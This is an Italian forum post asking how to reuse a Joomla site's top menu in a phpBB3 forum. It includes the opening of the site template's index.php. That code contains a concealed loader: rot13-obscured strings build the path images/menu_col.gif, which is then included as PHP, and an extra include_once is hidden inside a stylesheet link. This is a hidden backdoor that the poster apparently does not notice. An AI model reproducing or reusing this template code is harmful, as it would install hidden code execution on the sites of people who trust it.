Salve ragazzi... ho creato un sito con joomla e ho applicato un determinato template... ho installato anche il forum phpbb3, ci h olavorato parecchio e sto riuscendo ad adattarlo al template del sito. Vi posto anche il link, così da farvi anche un'idea:
http://www.lelepcassistenza.altervista.org/Ora ho un problema. Avevo intenzione di mettere il topmenu del sito, così com'è, anche nel forum, lasciando sempre la dinamicità, cioè facendo in modo che se decido di cambiare qualcosa nel menu, cambia sia nel sito che nel forum...
A livello grafico ci sono riuscito, infatti sono riuscito a mettere la barra nera del menu, ma non riesco ad inserire le voci... ho copiato la riga riguardante il menu, con annessi include a file php (ovviamente mettendo il link giusto), ma non funziona lo stesso... cosa devo cambiare esattamente?
Vi metto il listato della prima parte del file index.php del template, così da potervi fare un'idea.
<?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template;include_once('html/pagination.php'); ?>/css/ieonly.css" rel="stylesheet" type="text/css" />
<style>
#topnav ul li ul {
left: -999em;
margin-top: 0px;
margin-left: 0px;
}
</style>
<![endif]-->
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/mootools.js"></script>
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/moomenu.js"></script>
</head>
<body id="page_bg">
<a name="up" id="up"></a>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<?php include('functions.php'); ?>
<div id="top_menu"><div id="top_menu_left"><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/blank.gif" alt="hosting menu left" /></div><div id="topnav"><?php $hmenu->genHMenu (0); ?></div><div id="top_menu_right"><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/blank.gif" alt="hosting menu right" /></div><br clear="all" /></div>